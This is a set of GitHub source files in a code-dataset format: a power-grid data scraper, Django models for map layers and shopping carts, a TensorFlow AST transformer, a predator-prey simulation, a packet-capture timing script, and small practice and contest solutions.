wind_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tw')\n ncep_generation['wind_generation'] = wind_value\n\n solar_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_ts')\n ncep_generation['solar_generation'] = solar_value\n\n return ncep_generation\n\n\ndef fetch_escom_demand(session):\n escom_demand = {}\n\n # ESCOM Scheduled & Actual\n escom_html = helper_methods.get_response_soup('http://kptclsldc.com/Snapshot.aspx', session)\n escom_date_time = helper_methods.read_datetime_from_span_id(escom_html, 'Label6', 'DD/MM/YYYY HH:mm:ss')\n\n escom_demand['timestamp'] = escom_date_time.datetime\n\n scheduled_bescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label15')\n actual_bescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label10')\n escom_demand['scheduled_bescom_load'] = scheduled_bescom_load\n escom_demand['actual_bescom_load'] = actual_bescom_load\n\n scheduled_mescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label16')\n actual_mescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label11')\n escom_demand['scheduled_mescom_load'] = scheduled_mescom_load\n escom_demand['actual_mescom_load'] = actual_mescom_load\n\n scheduled_cesc_load = helper_methods.read_value_from_span_id(escom_html, 'Label17')\n actual_cesc_load = helper_methods.read_value_from_span_id(escom_html, 'Label12')\n escom_demand['scheduled_cesc_load'] = scheduled_cesc_load\n escom_demand['actual_cesc_load'] = actual_cesc_load\n\n scheduled_gescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label18')\n actual_gescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label13')\n escom_demand['scheduled_gescom_load'] = scheduled_gescom_load\n escom_demand['actual_gescom_load'] = actual_gescom_load\n\n scheduled_hescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label19')\n actual_hescom_load = helper_methods.read_value_from_span_id(escom_html, 'Label14')\n escom_demand['scheduled_hescom_load'] = scheduled_hescom_load\n escom_demand['actual_hescom_load'] = actual_hescom_load\n\n scheduled_total_load = helper_methods.read_value_from_span_id(escom_html, 'Label25')\n actual_total_load = helper_methods.read_value_from_span_id(escom_html, 'Label26')\n escom_demand['scheduled_total_load'] = scheduled_total_load\n escom_demand['actual_total_load'] = actual_total_load\n\n frequency_value = helper_methods.read_value_from_span_id(escom_html, 'Label1')\n escom_demand['frequency_hz'] = frequency_value\n\n return escom_demand\n\n\ndef fetch_data(session=None, conn=None, target_datetime=None, logger=None):\n cursor = conn.cursor()\n\n try:\n generation = fetch_production_by_generator(session)\n helper_methods.insert_into_table('kptcl_generation', generation, cursor, conn)\n except Exception as e:\n print(f'Could not fetch kptcl generation data: {e}')\n\n try:\n ncep_generation = fetch_ncep_production(session)\n helper_methods.insert_into_table('kptcl_ncep_generation', ncep_generation, cursor, conn)\n except Exception as e:\n print(f'Could not fetch kptcl ncep generation data: {e}')\n\n try:\n escom_demand = fetch_escom_demand(session)\n helper_methods.insert_into_table('kptcl_load', escom_demand, cursor, conn)\n except Exception as e:\n print(f'Could not fetch kptcl load data: {e}')\n\n\ndef run():\n session = Session()\n host = os.environ['HOST']\n port = int(os.environ['PORT'])\n dbname = os.environ['DB']\n user = os.environ['USER']\n password = os.environ['PASSWORD']\n conn = pymysql.connect(host, user=user, port=port,\n passwd=password, db=dbname)\n fetch_data(session, conn)\n\n\ndef lambda_handler(event, context):\n run()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"utkarshdalal/brookings_data_scrapers","sub_path":"kptcl_scraper.py","file_name":"kptcl_scraper.py","file_ext":"py","file_size_in_byte":10600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10188715465","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\n\nimport gast\nimport six\n\nfrom tensorflow.contrib.autograph.pyct import anno\nfrom tensorflow.contrib.autograph.pyct import compiler\nfrom tensorflow.contrib.autograph.pyct import pretty_printer\n\n\nclass AutographParseError(SyntaxError):\n pass\n\n\ndef try_ast_to_source(node):\n try:\n return compiler.ast_to_source(node)\n except AssertionError:\n return ''\n\n\nclass Base(gast.NodeTransformer):\n \"\"\"Base class for specialized transformers.\n\n Scope-local state tracking: to keep state across nodes, at the level of\n (possibly nested) scopes, use enter/exit_local_scope and set/get_local.\n You must call enter/exit_local_scope manually, but the transformer detects\n when they are not properly paired.\n \"\"\"\n\n def __init__(self, context):\n \"\"\"Initialize the transformer. Subclasses should call this.\n\n Args:\n context: An EntityContext.\n \"\"\"\n self._lineno = 0\n self._col_offset = 0\n self.context = context\n self._enclosing_entities = []\n\n # A stack that allows keeping mutable, scope-local state where scopes may be\n # nested. For example, it can be used to track the usage of break\n # statements in each loop, where loops may be nested.\n self._local_scope_state = []\n self.enter_local_scope()\n\n @property\n def enclosing_entities(self):\n return tuple(self._enclosing_entities)\n\n @property\n def locel_scope_level(self):\n return len(self._local_scope_state)\n\n def enter_local_scope(self):\n self._local_scope_state.append({})\n\n def exit_local_scope(self):\n return self._local_scope_state.pop()\n\n def set_local(self, name, value):\n self._local_scope_state[-1][name] = value\n\n def get_local(self, name, default=None):\n return self._local_scope_state[-1].get(name, default)\n\n def debug_print(self, node):\n \"\"\"Helper method useful for debugging.\"\"\"\n if __debug__:\n print(pretty_printer.fmt(node))\n return node\n\n def visit_block(self, nodes):\n \"\"\"Helper equivalent to generic_visit, but for node lists.\"\"\"\n results = []\n for node in nodes:\n replacement = self.visit(node)\n if replacement:\n if isinstance(replacement, (list, tuple)):\n results.extend(replacement)\n else:\n results.append(replacement)\n return results\n\n def visit(self, node):\n source_code = self.context.source_code\n source_file = self.context.source_file\n did_enter_function = False\n local_scope_state_size = len(self._local_scope_state)\n\n try:\n if isinstance(node, (gast.FunctionDef, gast.ClassDef, gast.Lambda)):\n self._enclosing_entities.append(node)\n did_enter_function = True\n\n if source_code and hasattr(node, 'lineno'):\n self._lineno = node.lineno\n self._col_offset = node.col_offset\n if anno.hasanno(node, anno.Basic.SKIP_PROCESSING):\n return node\n return super(Base, self).visit(node)\n\n except (ValueError, AttributeError, KeyError, NotImplementedError,\n AssertionError) as e:\n msg = '%s: %s\\nOffending source:\\n%s\\n\\nOccurred at node:\\n%s' % (\n e.__class__.__name__, str(e), try_ast_to_source(node),\n pretty_printer.fmt(node, color=False))\n if source_code:\n line = source_code.splitlines()[self._lineno - 1]\n else:\n line = ''\n six.reraise(AutographParseError,\n AutographParseError(\n msg,\n (source_file, self._lineno, self._col_offset + 1, line)),\n sys.exc_info()[2])\n finally:\n if did_enter_function:\n self._enclosing_entities.pop()\n\n if local_scope_state_size != len(self._local_scope_state):\n raise AssertionError(\n 'Inconsistent local scope stack. Before entering node %s, the'\n ' stack had length %d, after exit it has length %d. This'\n ' indicates enter_local_scope and exit_local_scope are not'\n ' well paired.')\n","repo_name":"miglopst/cs263_spring2018","sub_path":"tensorflow/contrib/autograph/pyct/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"27183702379","text":"from .models import Cart, Cart_item\nfrom .views import my_cart\n\n\ndef counter(request):\n count = 0\n if 'admin' in request.path:\n return {}\n else:\n try:\n cart = Cart.objects.filter(cart_id=my_cart(request))\n cart_items = Cart_item.objects.all().filter(cart=cart[:1])\n for cart_item in cart_items:\n count += cart_item.quantity\n except Cart.DoesNotExist:\n count = 0\n return dict(count=count)\n","repo_name":"ajith0208/Ecommerce_Project","sub_path":"ecommerce/cart/Context_Processors.py","file_name":"Context_Processors.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25478016414","text":"# -*- coding: utf-8 -*-\n# This technical data was produced for the U. S. Government under Contract No. W15P7T-13-C-F600, and\n# is subject to the Rights in Technical Data-Noncommercial Items clause at DFARS 252.227-7013 (FEB 2012)\n\n\nimport json\nfrom django.contrib.gis.db import models\nfrom geoevents.taggit.managers import TaggableManager\nfrom datetime import datetime\n\nIMAGE_FORMATS = (\n ('image/png', 'image/png'),\n ('image/png8', 'image/png8'),\n ('image/jpeg', 'image/jpeg'),\n ('image/gif', 'image/gif'),\n ('image/tiff', 'image/tiff'),\n ('image/tiff8', 'image/tiff8'),\n ('image/geotiff', 'image/geotiff'),\n ('image/geotiff8', 'image/geotiff8'),\n ('image/svg', 'image/svg'),\n ('rss', 'rss'),\n ('kml', 'kml'),\n ('kmz', 'kmz'),\n ('json', 'json'),\n ('png', 'png'),\n ('png8', 'png8'),\n ('jpeg', 'jpeg'),\n ('jpg', 'jpg'),\n ('gif', 'gif'),\n ('tiff', 'tiff'),\n ('tiff8', 'tiff8'),\n ('geotiff', 'geotiff'),\n ('geotiff8', 'geotiff8'),\n ('svg', 'svg'),\n)\n\nSERVICE_TYPES = (\n ('ArcGIS93Rest', 'ArcGIS93Rest'),\n ('WMS', 'WMS'),\n ('KML', 'KML'),\n ('GeoRSS', 'GeoRSS'),\n ('GeoJSON', 'GeoJSON'),\n ('GPX', 'GPX'),\n ('GML', 'GML'),\n ('WMTS', 'WMTS'),\n ('MapBox', 'MapBox'),\n ('TileServer', 'TileServer'),\n ('GetCapabilities', 'GetCapabilities'),\n)\n\nMAP_CATEGORIES = [(n, n) for n in sorted(\n ['Human Geography', 'Hurricanes', 'Floods', 'Earthquakes', 'Fires', 'Volcanoes', 'Tsunami', 'Infrastructure',\n 'Event-Specific', 'Disease'])]\nINFO_FORMATS = [(n, n) for n in sorted(\n ['application/vnd.ogc.wms_xml', 'application/xml', 'text/html', 'text/plain', 'application/json'])]\n\nPARSER_CATEGORIES = (\n ('palanterra', 'palanterra'),\n ('uscg_ships', 'uscg_ships'),\n ('icnet', 'icnet'),\n ('dg_wmts_time', 'dg_wmts_time'),\n ('geomedia_triaged', 'geomedia_triaged'),\n ('harvester_earthquake', 'harvester_earthquake'),\n ('harvester_fire', 'harvester_fire'),\n ('harvester_tsunami', 'harvester_tsunami'),\n ('harvester_flood', 'harvester_flood'),\n ('harvester_volcano', 'harvester_volcano'),\n ('ima', 'ima'),\n)\n\n\nclass Layer(models.Model):\n \"\"\"\n A layer object that can be added to any map.\n \"\"\"\n\n name = models.CharField(max_length=200)\n type = models.CharField(choices=SERVICE_TYPES, max_length=75)\n url = models.URLField(max_length=600,\n help_text='URL of service. If WMS, can be any valid URL. Otherwise, the URL will require a local proxy and Firewall change to access it')\n layer = models.CharField(max_length=800, null=True, blank=True,\n help_text='The layer name from the GetCapabilities document. Many ESRI servers have just \"0\" or \"1\" for layers names. Layer names can sometimes be comma-separated (\"0,1,2\"), and are not needed for data layers such as KML, GeoRSS, GeoJSON..')\n image_format = models.CharField(null=True, blank=True, choices=IMAGE_FORMATS, max_length=75,\n help_text='The MIME type of the image format to use for tiles on WMS layers (image/png, image/jpeg image/gif...). Double check that the server exposes this exactly - some servers push png instead of image/png.')\n tags = TaggableManager(blank=True, help_text='Tags to help search for layers')\n description = models.TextField(max_length=800, null=True, blank=True,\n help_text='Text to show in layer chooser, please be descriptive - this will soon be searchable')\n attribution = models.CharField(max_length=200, null=True, blank=True,\n help_text=\"Attribution from layers to the map display (will show in bottom of map when layer is visible).\")\n\n ## Advanced layer options\n objects = models.GeoManager()\n category = models.CharField(max_length=50, null=True, blank=True, choices=MAP_CATEGORIES,\n help_text='Categories that will be used to organize map layers that users can add to map from the Layers button')\n styles = models.CharField(null=True, blank=True, max_length=200,\n help_text='The name of a style to use for this layer (only useful for WMS layers if the server exposes it.)')\n transparent = models.BooleanField(default=True,\n help_text='If WMS or overlay, should the tiles be transparent where possible?')\n refreshrate = models.PositiveIntegerField(\n help_text='Layer refresh rate in seconds for vector/data layers (will not refresh WMS layers)',\n verbose_name=\"Layer Refresh Rate\", blank=True, null=True)\n token = models.CharField(max_length=400, null=True, blank=True,\n help_text='Authentication token, if required (usually only for secure layer servers)')\n created_at = models.DateTimeField(default=datetime.now, blank=True)\n updated_at = models.DateTimeField(auto_now=True, blank=True, null=True)\n\n show_in_table = models.BooleanField(default=True,\n help_text=\"Draw a table on the Event Pages with any info found from results.\")\n allow_image_modifications = models.BooleanField(default=False,\n help_text=\"Allow the user to change Brightness, Sharpness, etc on layer - requires that the server can proxy to the source server and thus Firewall might need to be opened.\")\n extent = models.PolygonField(null=True, blank=True, help_text='Extent of the layer.')\n layer_parsing_function = models.CharField(max_length=100, blank=True, null=True, choices=PARSER_CATEGORIES,\n help_text='Advanced - The javascript function used to parse a data service (GeoJSON, GeoRSS, KML), needs to be an internally known parser. Contact an admin if you need data parsed in a new way.')\n enable_identify = models.BooleanField(default=False,\n help_text='Advanced - Allow user to click map to query layer for details. The map server must support queries for this layer.')\n info_format = models.CharField(max_length=75, null=True, blank=True, choices=INFO_FORMATS,\n help_text='Advanced - what format the server returns for an WMS-I query')\n root_field = models.CharField(max_length=100, null=True, blank=True,\n help_text='Advanced - For WMS-I (queryable) layers, the root field returned by server. Leave blank for default (will usually be \"FIELDS\" in returned XML).')\n fields_to_show = models.CharField(max_length=200, null=True, blank=True,\n help_text='Fields to show when someone uses the identify tool to click on the layer. Leave blank for all.')\n downloadableLink = models.URLField(max_length=300, null=True, blank=True,\n help_text='URL of link to supporting tool (such as a KML document that will be shown as a download button)')\n layer_params = models.TextField(null=True, blank=True,\n help_text='JSON key/value pairs to be sent to the web service. Use double-quotes around both the key and value for JSON. ex: {\"crs\":\"urn:ogc:def:crs:EPSG::4326\"}')\n spatial_reference = models.CharField(max_length=32, blank=True, null=True, default=\"EPSG:4326\",\n help_text='The spatial reference of the service. Should be in ESPG:XXXX format.')\n constraints = models.TextField(null=True, blank=True)\n\n ## Primarily for http://trac.osgeo.org/openlayers/wiki/OpenLayersOptimization\n additional_domains = models.TextField(null=True, blank=True,\n help_text='Semicolon seperated list of additional domains for the layer.')\n\n\n ## Not yet implemented\n min_scale = models.FloatField(null=True, blank=True)\n max_scale = models.FloatField(null=True, blank=True,\n help_text='Not yet implemented - Used for Zoom to Layer operation.')\n source_params = models.TextField(null=True, blank=True,\n help_text='Not yet implemented - Options to pass into layer builder')\n\n def __unicode__(self):\n return '{0}'.format(self.name)\n\n def tags_as_list(self):\n \"\"\"\n Returns the layer's tags.\n \"\"\"\n return self.tags.all()\n\n def get_layer_urls(self):\n \"\"\"\n Returns a list of urls for the layer.\n \"\"\"\n urls = [self.url]\n\n if getattr(self, 'additional_domains'):\n map(urls.append, (domain for domain in self.additional_domains.split(\";\") if domain))\n\n return urls\n\n def get_layer_params(self):\n \"\"\"\n Converts a layer's parameters to json.\n \"\"\"\n try:\n params = json.loads(self.layer_params)\n\n except:\n params = dict()\n\n model_fields = [field.name for field in self._meta.fields if field.name in params.keys()]\n\n for key in model_fields:\n if self.__getattribute__(key):\n params.pop(key)\n\n return params\n\n class Meta:\n ordering = [\"name\"]\n\n\nclass Map(models.Model):\n \"\"\"\n A Map aggregates several layers together.\n \"\"\"\n\n title = models.CharField(max_length=75, unique=True)\n description = models.TextField(max_length=800, blank=True, null=True)\n zoom = models.IntegerField(help_text='Sets the default zoom level of the map.')\n projection = models.CharField(max_length=32, blank=True, null=True, default=\"EPSG:4326\",\n help_text='Set the default projection for layers added to this map. Note that the projection of the map is usually determined by that of the current baseLayer')\n center_x = models.FloatField(default=0.0,\n help_text='Sets the center x coordinate of the map. Maps on event pages default to the location of the event.')\n center_y = models.FloatField(default=0.0,\n help_text='Sets the center y coordinate of the map. Maps on event pages default to the location of the event.')\n created = models.DateTimeField(auto_now_add=True)\n last_updated = models.DateTimeField(auto_now_add=True)\n tags = TaggableManager(blank=True)\n\n def __unicode__(self):\n return '{0}'.format(self.title)\n\n @property\n def center(self):\n \"\"\"\n A handy shortcut for the center_x and center_y properties as a tuple\n (read only)\n \"\"\"\n return (self.center_x, self.center_y)\n\n @property\n def layers(self):\n layers = MapLayer.objects.filter(map=self.id)\n return [layer for layer in layers]\n\n def map_layers_json(self):\n def layer_json(map_layer):\n return {\n \"id\": map_layer.layer.id,\n \"name\": map_layer.layer.name,\n \"format\": map_layer.layer.image_format,\n \"type\": map_layer.layer.type,\n \"url\": map_layer.layer.get_layer_urls(),\n \"layer\": map_layer.layer.layer,\n \"shown\": map_layer.shown,\n \"transparent\": map_layer.layer.transparent,\n \"show_in_table\": map_layer.layer.show_in_table,\n \"allow_image_modifications\": map_layer.layer.allow_image_modifications,\n \"opacity\": map_layer.opacity,\n \"layerParams\": map_layer.layer.get_layer_params(),\n \"sourceParams\": map_layer.layer.source_params,\n \"isBaseLayer\": map_layer.is_base_layer,\n \"displayInLayerSwitcher\": map_layer.display_in_layer_switcher,\n \"refreshrate\": map_layer.layer.refreshrate,\n \"token\": map_layer.layer.token,\n \"category\": map_layer.layer.category,\n \"attribution\": map_layer.layer.attribution,\n \"spatialReference\": map_layer.layer.spatial_reference,\n \"layerParsingFunction\": map_layer.layer.layer_parsing_function,\n \"minScale\": map_layer.layer.min_scale,\n \"maxScale\": map_layer.layer.max_scale,\n \"enableIdentify\": map_layer.layer.enable_identify,\n \"rootField\": map_layer.layer.root_field,\n \"infoFormat\": map_layer.layer.info_format,\n \"fieldsToShow\": map_layer.layer.fields_to_show,\n \"description\": map_layer.layer.description,\n \"downloadableLink\": map_layer.layer.downloadableLink,\n \"tags\": [n.name for n in map_layer.layer.tags_as_list()],\n \"styles\": map_layer.layer.styles,\n }\n\n map_services = []\n for map_layer in self.layers:\n map_services.append(layer_json(map_layer))\n\n return json.dumps(map_services)\n\n def map_json(self):\n return json.dumps({\n \"center_x\": self.center_x,\n \"center_y\": self.center_y,\n \"zoom\": self.zoom,\n \"projection\": self.projection or \"EPSG:4326\",\n })\n\n\nclass MapLayer(models.Model):\n \"\"\"\n The MapLayer is the mechanism that joins a Layer to a Map and allows for custom look and feel.\n \"\"\"\n\n map = models.ForeignKey(Map, related_name='map_set')\n layer = models.ForeignKey(Layer, related_name='map_layer_set')\n shown = models.BooleanField(default=True)\n stack_order = models.IntegerField()\n opacity = models.FloatField(default=.80)\n is_base_layer = models.BooleanField(\n help_text=\"Base Layers are mutually exclusive layers, meaning only one can be enabled at any given time. The currently active base layer determines the available projection (coordinate system) and zoom levels available on the map.\")\n display_in_layer_switcher = models.BooleanField()\n\n class Meta:\n ordering = [\"stack_order\"]\n\n def __unicode__(self):\n return 'Layer {0}: {1}'.format(self.stack_order, self.layer)","repo_name":"ngageoint/geoevents","sub_path":"geoevents/maps/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13968,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"61"} +{"seq_id":"27647364357","text":"from ModelMain import Model, ModelException\r\nfrom Utils import lerp\r\nimport numpy as np\r\nimport math\r\nimport random\r\n\r\n\r\n# An implementation of the CA model described in the PWS\r\nclass CAModel(Model):\r\n # shape: a tuple giving the width, height, depth, etc. of the grid\r\n # num_runs: amount of runs the average is taken over\r\n def __init__(self, shape, num_runs, max_t, N, steps_per_time_is_parameter=True,\r\n x_factor_is_parameter=True, y_factor_is_parameter=True,\r\n steps_per_time=None, x_factor=None, y_factor=None):\r\n self.shape = shape\r\n self.num_runs = num_runs\r\n self.max_t = max_t\r\n self.N = N\r\n self.steps_per_time_is_parameter = steps_per_time_is_parameter\r\n self.x_factor_is_parameter = x_factor_is_parameter\r\n self.y_factor_is_parameter = y_factor_is_parameter\r\n self.steps_per_time = steps_per_time\r\n self.x_factor = x_factor\r\n self.y_factor = y_factor\r\n\r\n def get_prediction(self, parameters: dict, x0: float, y0: float):\r\n num_cells = math.prod(self.shape)\r\n steps_per_time = parameters[\"steps_per_time\"] if self.steps_per_time_is_parameter else self.steps_per_time\r\n x_factor = parameters[\"x_factor\"] if self.x_factor_is_parameter else self.x_factor\r\n y_factor = parameters[\"y_factor\"] if self.y_factor_is_parameter else self.y_factor\r\n num_steps = math.ceil(self.max_t*steps_per_time)\r\n\r\n # compute chances for each cell to be a predator or a prey animal in the initial grid\r\n x_chance = x0/x_factor\r\n y_chance = y0/y_factor\r\n\r\n result = np.zeros((num_steps, 2), dtype=float)\r\n\r\n for i in range(self.num_runs):\r\n num_x = 0\r\n num_y = 0\r\n random_grid = np.random.rand(*self.shape)\r\n grid = np.random.randint(0, 3, self.shape, int)\r\n # loop through all points\r\n it = np.nditer(random_grid, flags=[\"multi_index\"])\r\n while not it.finished:\r\n value = random_grid[it.multi_index]\r\n if value < x_chance:\r\n grid[it.multi_index] = 1\r\n num_x += 1\r\n elif value < x_chance + y_chance:\r\n grid[it.multi_index] = 2\r\n num_y += 1\r\n it.iternext()\r\n del random_grid\r\n\r\n for j in range(num_steps):\r\n delta_x, delta_y = self.get_step_changes(grid, parameters)\r\n num_x += delta_x\r\n num_y += delta_y\r\n result[j, 0] = num_x/num_cells*x_factor\r\n result[j, 1] = num_y/num_cells*y_factor\r\n\r\n result /= self.num_runs\r\n\r\n # define functions to return\r\n def x(t):\r\n # check whether the value of t is not too large or too small\r\n if t < 0 or t > self.max_t:\r\n raise ModelException(\"t={} out of bounds\".format(t))\r\n # find the indices of the nearest points in time for which the amount was computed\r\n index = math.floor(t*steps_per_time)\r\n next_index = math.ceil(t*steps_per_time)\r\n # interpolate\r\n if index == next_index:\r\n return result[index, 0]\r\n else:\r\n return lerp(result[index, 0], result[index+1, 0], t*steps_per_time-index)\r\n\r\n def y(t):\r\n # check whether the value of t is not too large or too small\r\n if t < 0 or t > self.max_t:\r\n raise ModelException(\"t={} out of bounds\".format(t))\r\n # find the indices of the nearest points in time for which the amount was computed\r\n index = math.floor(t*steps_per_time)\r\n next_index = math.ceil(t*steps_per_time)\r\n # interpolate\r\n if index == next_index:\r\n return result[index, 1]\r\n else:\r\n return lerp(result[index, 1], result[index+1, 1], t*steps_per_time-index)\r\n\r\n return x, y\r\n\r\n def get_step_changes(self, grid, parameters):\r\n delta_x = 0\r\n delta_y = 0\r\n\r\n for _ in range(self.N):\r\n # generate random cell and a neighbour\r\n cell_index = tuple(random.randrange(0, m) for m in self.shape)\r\n neighbour_axis = random.randint(0, len(self.shape))\r\n neighbour_sign = -1 if random.getrandbits(1) else 1\r\n neighbour_index = tuple((cell_index[i]+neighbour_sign) % self.shape[i]\r\n if i == neighbour_axis else cell_index[i] for i in range(len(self.shape)))\r\n\r\n # perform the algorithm\r\n if grid[cell_index] == 2 and grid[neighbour_index] == 1: # fox eats rabbit\r\n grid[neighbour_index] = 0\r\n delta_x -= 1\r\n if random.random() <= parameters[\"sigma_f\"]:\r\n grid[neighbour_index] = 2\r\n delta_y += 1\r\n elif grid[cell_index] == 2 and random.random() <= parameters[\"p_f\"]: # fox dies\r\n grid[cell_index] = 0\r\n delta_y -= 1\r\n elif grid[cell_index] == 2: # fox moves to vacancy\r\n grid[cell_index] = 0\r\n grid[neighbour_index] = 2\r\n elif grid[cell_index] == 1 and grid[neighbour_index] == 0: # rabbit moves or reproduces into vacancy\r\n if random.random() <= parameters[\"mu\"]: # rabbit reproduces\r\n grid[neighbour_index] = 1\r\n delta_x += 1\r\n else: # rabbit moves\r\n grid[cell_index] = 0\r\n grid[neighbour_index] = 1\r\n\r\n return delta_x, delta_y\r\n","repo_name":"koenbres04/PWSKoenIes2020","sub_path":"PWSKoenIes/CAModels.py","file_name":"CAModels.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24160510911","text":"x = None\nprint(x)\n\nx = 134134.1414124\nprint(type(x))\n\n\nx = [1,2132,4,142,1,41,41]\nprint(x)\n\nfor y in x:\n print(y)\n\n\ndef my_function():\n p = 23.1341431\n print(p / 2.0)\n\n\nmy_function()\n\n\nx = 2\ny = 5\nif(x == 2 or y == 5):\n print(\"We are int\")\nelse:\n print(\"almost we did it\")\n\nx = False\nif(x == (not True)):\n print(\"ok\")\n\na = (1,2,3)\nprint(a)\n\na = \"123\"\nb = int(a)\n\n\ndict = {\n \"one\":1,\n \"two\":2,\n \"three\":3\n}\n\nfor k in dict:\n print(\"{} is {}\", format(k,dict[k]))","repo_name":"ZahariAT/HackBulgaria2019","sub_path":"week0{1,2}/Testing25022019.py","file_name":"Testing25022019.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23415173901","text":"from threading import currentThread\n\nclass TailRecursiveCall(Exception):\n pass\n\nclass Rec_f(object):\n def __init__(self, func):\n self.tr_d = {}\n self.func = func\n\n def __call__(self, *args, **kw):\n self.args = args\n self.kw = kw\n thread = currentThread()\n if thread not in self.tr_d:\n self.tr_d[thread] = {}\n self.tr_d[thread][\"depth\"] = 0\n self.tr_d[thread][\"depth\"] += 1\n # Record the arguments passed to function on this thread\n self.tr_d[thread][\"args\"] = args\n self.tr_d[thread][\"kw\"] = kw\n depth = self.tr_d[thread][\"depth\"]\n # If we are re-entering the same function on the same thread:\n if depth > 1:\n # Effectively detours execution to the \"Landing Point\",\n # but two execution frames above the current one:\n raise TailRecursiveCall\n over = False\n while not over:\n over = True\n args = self.tr_d[thread][\"args\"]\n kw = self.tr_d[thread][\"kw\"]\n try:\n # Execute the function with the latest arguments for this thread.\n result = self.func(*args, **kw)\n except TailRecursiveCall:\n # Landing point if the function tried to recurse itself.\n # Two execution frames above.\n self.tr_d[thread][\"depth\"] -= 1\n over = False\n self.tr_d[thread][\"depth\"] -= 1\n return result\n\ndef tailrecursive(func):\n return Rec_f(func)\n\n\n\nimport itertools\nimport numpy\n\nfn = '/Users/vivanov/Downloads/A-small-attempt1.in'\n\n\nwith open(fn) as f:\n lines = f.read().splitlines()[1:]\n l = []\n i = 0\n while i < len(lines):\n ans1 = [int(k) for k in lines[i].split(' ')][0] - 1\n i += 1\n a = []\n for j in range(4):\n a.append([int(k) for k in lines[i].split(' ')])\n i += 1\n a1 = numpy.array(a)\n\n ans2 = [int(k) for k in lines[i].split(' ')][0] - 1\n i += 1\n a = []\n for j in range(4):\n a.append([int(k) for k in lines[i].split(' ')])\n i += 1\n a2 = numpy.array(a)\n l.append({ 'ans1' : ans1, 'a1': a1 , 'ans2' : ans2, 'a2': a2})\n\npass\n\n\ndef search(state):\n a1 = state['a1']\n a2 = state['a2']\n ans1 = state['ans1']\n ans2 = state['ans2']\n equals = []\n res = ''\n for i in a1[ans1]:\n for j in a2[ans2]:\n if i == j:\n equals.append(i)\n if len(equals) == 1:\n res = str(equals[0])\n elif len(equals) > 1:\n res = 'Bad magician!'\n else :\n res = 'Volunteer cheated!'\n return res\n\nwith open('out', 'w') as f :\n to_write = []\n for i in range(len(l)):\n to_write.append('Case #%s: %s \\n' %((i+1), search(l[i])))\n f.writelines(to_write)\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2909.py","file_name":"2909.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29285033662","text":"import json\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nDATA_FILE = \"meter_try4_json\"\nTime = []\nwith open(DATA_FILE, \"r\") as read_data:\n data = json.load(read_data)\ndata_length = len(data)\nprint(\"length:\", data_length)\nprint(\"data type\", type(data))\n\nfor n in range(data_length):\n if 'ip' in data[n]['_source']['layers']:\n ip_src = data[n]['_source']['layers']['ip']['ip.src']\n if ip_src == \"192.168.1.27\":\n if 'rtps' in data[n]['_source']['layers']:\n if 'rtps.sm.id_tree' in data[n]['_source']['layers']['rtps']:\n if 'serializedData' in data[n]['_source']['layers']['rtps']['rtps.sm.id_tree']:\n if 'rtps.issueData' in data[n]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']:\n issueData = data[n]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']['rtps.issueData']\n if \"00:00:40:41\" in issueData :\n t1 = float(data[n]['_source']['layers']['frame']['frame.time_epoch'])\n # print(\"t1 = \", t1)\n for i in range(data_length-n):\n n2 = n+i\n if 'ip' in data[n2]['_source']['layers']:\n ip_src2 = data[n2]['_source']['layers']['ip']['ip.src']\n if ip_src2 == \"192.168.1.13\":\n if 'rtps' in data[n2]['_source']['layers']:\n if 'rtps.sm.id_tree' in data[n2]['_source']['layers']['rtps']:\n if 'serializedData' in data[n2]['_source']['layers']['rtps']['rtps.sm.id_tree']:\n if 'rtps.issueData' in data[n2]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']:\n issueData2 = data[n2]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']['rtps.issueData']\n if \"00:4f:46:46:00\" in issueData2 :\n t2 = float(data[n2]['_source']['layers']['frame']['frame.time_epoch'])\n # print(\"t2 = \", t2)\n t = t2 - t1\n Time.append(t)\n break\n\nprint(Time)\nwith open('Time.json', 'w') as outfile:\n json.dump(Time, outfile)\n#sns.kdeplot(Time)\n#plt.hist(Time)\nTime = pd.Series(Time, name = \"Elapsed Time\")\nsns.distplot(Time)\nplt.savefig('Time.png')\nplt.show()","repo_name":"Jetudie/practice_data","sub_path":"wireshark_data/meter_relay/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17089590423","text":"N = int(input())\r\nmatrix = [list(input()) for _ in range(N)]\r\n\r\ncnt = 0\r\nfor i in range(N):\r\n length = 0\r\n for j in range(N):\r\n if matrix[i][j] == \".\":\r\n length += 1\r\n if matrix[i][j] == \"X\" or j == N-1:\r\n if length >= 2:\r\n cnt += 1\r\n length = 0\r\n\r\ncnt2 